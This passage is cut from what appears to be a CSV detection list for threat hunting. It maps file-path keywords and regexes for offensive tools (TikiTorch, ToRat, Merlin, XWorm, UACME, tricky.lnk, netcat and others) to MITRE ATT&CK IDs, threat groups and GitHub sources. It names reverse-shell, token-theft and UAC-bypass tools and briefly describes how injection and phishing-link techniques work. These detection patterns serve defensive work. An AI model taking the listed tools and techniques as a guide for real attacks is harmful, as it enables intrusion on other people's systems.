T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*\TikiService.exe*",".{0,1000}\\TikiService\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*\TikiSpawn.*",".{0,1000}\\TikiSpawn\..{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*\tikispawn.xml*",".{0,1000}\\tikispawn\.xml.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*\TikiTorch\Aggressor*",".{0,1000}\\TikiTorch\\Aggressor.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*\tmp\dll-collection*",".{0,1000}\\tmp\\dll\-collection.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","10","947","121","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z" "*\Tmp\nc.exe*",".{0,1000}\\Tmp\\nc\.exe.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\Tmp\netcat.exe*",".{0,1000}\\Tmp\\netcat\.exe.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\tmp_payload.txt*",".{0,1000}\\tmp_payload\.txt.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","9","1","49","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z" "*\TokenDump.exe*",".{0,1000}\\TokenDump\.exe.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","7","673","104","2024-04-23T03:05:39Z","2021-12-28T13:14:25Z" "*\TokenExfiltereter.cs*",".{0,1000}\\TokenExfiltereter\.cs.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","0","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z" "*\TokenPlayer.cpp*",".{0,1000}\\TokenPlayer\.cpp.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","0","N/A","10","3","254","46","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z" "*\TokenPlayer.exe*",".{0,1000}\\TokenPlayer\.exe.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","0","N/A","10","3","254","46","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z" "*\TokenPlayer\TokenPlayer\*",".{0,1000}\\TokenPlayer\\TokenPlayer\\.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","0","N/A","10","3","254","46","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z" "*\tokenprivileges.c*",".{0,1000}\\tokenprivileges\.c.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","4","330","38","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" "*\tokenprivileges.o*",".{0,1000}\\tokenprivileges\.o.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","4","330","38","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" "*\TokenStomp.exe*",".{0,1000}\\TokenStomp\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\TokenUniverse.zip*",".{0,1000}\\TokenUniverse\.zip.{0,1000}","offensive_tool_keyword","TokenUniverse","An advanced tool for working with access tokens and Windows security policy.","T1134 - T1055 - T1056 - T1222 - T1484","TA0004 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/diversenok/TokenUniverse","1","0","N/A","8","6","529","67","2024-04-12T02:04:50Z","2018-06-22T21:02:16Z" "*\TokenUniverse\TokenUniverse.*",".{0,1000}\\TokenUniverse\\TokenUniverse\..{0,1000}","offensive_tool_keyword","TokenUniverse","An advanced tool for working with access tokens and Windows security policy.","T1134 - T1055 - T1056 - T1222 - T1484","TA0004 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/diversenok/TokenUniverse","1","0","N/A","8","6","529","67","2024-04-12T02:04:50Z","2018-06-22T21:02:16Z" "*\Tokenvator\*",".{0,1000}\\Tokenvator\\.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "*\tools\DocLnk.exe*",".{0,1000}\\tools\\DocLnk\.exe.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","N/A","10","3","209","47","2024-03-24T16:47:03Z","2024-03-24T16:36:46Z" "*\Tools\ResHacker.exe*",".{0,1000}\\Tools\\ResHacker\.exe.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*\tor.exe*",".{0,1000}\\tor\.exe.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","0","N/A","9","10","N/A","N/A","N/A","N/A" "*\Tor\tor.exe*",".{0,1000}\\Tor\\tor\.exe.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","0","N/A","8","4","333","52","2024-04-04T22:56:00Z","2023-02-09T02:08:07Z" "*\Tor\torrc*",".{0,1000}\\Tor\\torrc.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","0","N/A","8","4","333","52","2024-04-04T22:56:00Z","2023-02-09T02:08:07Z" "*\ToRat\cmd\*",".{0,1000}\\ToRat\\cmd\\.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","0","N/A","10","10","949","198","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z" "*\ToRat\keygen\*",".{0,1000}\\ToRat\\keygen\\.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","0","N/A","10","10","949","198","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z" "*\ToRat\torat_client\*",".{0,1000}\\ToRat\\torat_client\\.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","0","N/A","10","10","949","198","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z" "*\ToRat\torat_server\*",".{0,1000}\\ToRat\\torat_server\\.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","0","N/A","10","10","949","198","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z" "*\ToRat-master.zip*",".{0,1000}\\ToRat\-master\.zip.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","0","N/A","10","10","949","198","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z" "*\TorBrowser*",".{0,1000}\\TorBrowser.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","0","N/A","8","4","333","52","2024-04-04T22:56:00Z","2023-02-09T02:08:07Z" "*\torbrowser-install-*.exe *",".{0,1000}\\torbrowser\-install\-.{0,1000}\.exe\s\s.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","0","N/A","9","10","N/A","N/A","N/A","N/A" "*\tor-browser-win32*.*",".{0,1000}\\tor\-browser\-win32.{0,1000}\..{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","0","N/A","9","10","N/A","N/A","N/A","N/A" "*\tor-browser-win64*.*",".{0,1000}\\tor\-browser\-win64.{0,1000}\..{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","0","N/A","9","10","N/A","N/A","N/A","N/A" "*\tor-static-windows-amd64.zip*",".{0,1000}\\tor\-static\-windows\-amd64\.zip.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","0","N/A","10","10","949","198","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z" "*\TortoiseSVNHookScripts.cs*",".{0,1000}\\TortoiseSVNHookScripts\.cs.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1302","244","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "*\toteslegit.ps1*",".{0,1000}\\toteslegit\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\tricky.lnk\*",".{0,1000}\\tricky\.lnk\\.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","0","N/A","N/A","2","108","35","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z" "*\tricky.ps1*",".{0,1000}\\tricky\.ps1.{0,1000}","offensive_tool_keyword","MacroMeter","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","0","N/A","N/A","2","108","35","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z" "*\tricky.vbs*",".{0,1000}\\tricky\.vbs.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","0","N/A","N/A","2","108","35","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z" "*\tricky2.ps1*",".{0,1000}\\tricky2\.ps1.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","0","N/A","N/A","2","108","35","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z" "*\TruffleSnout.exe*",".{0,1000}\\TruffleSnout\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\TrustExec.exe*",".{0,1000}\\TrustExec\.exe.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","7","673","104","2024-04-23T03:05:39Z","2021-12-28T13:14:25Z" "*\tunnel-socks5.py*",".{0,1000}\\tunnel\-socks5\.py.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*\TunnelVision-main*",".{0,1000}\\TunnelVision\-main.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","N/A","9","7","N/A","N/A","N/A","N/A" "*\TunnelVisionVM.ova*",".{0,1000}\\TunnelVisionVM\.ova.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","N/A","9","7","N/A","N/A","N/A","N/A" "*\turbo-intruder-all.jar*",".{0,1000}\\turbo\-intruder\-all\.jar.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","0","N/A","N/A","10","3044","627","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*\uac.py*",".{0,1000}\\uac\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\uac_bypass.vbs*",".{0,1000}\\uac_bypass\.vbs.{0,1000}","offensive_tool_keyword","lnk2pwn","Malicious Shortcut(.lnk) Generator","T1204 - T1059.007","TA0001 - TA0002","N/A","N/A","Phishing","https://github.com/it-gorillaz/lnk2pwn","1","0","N/A","8","2","154","32","2018-11-23T17:18:49Z","2018-11-23T00:12:48Z" "*\UACBypass.dll*",".{0,1000}\\UACBypass\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*\UACME-*.zip*",".{0,1000}\\UACME\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation 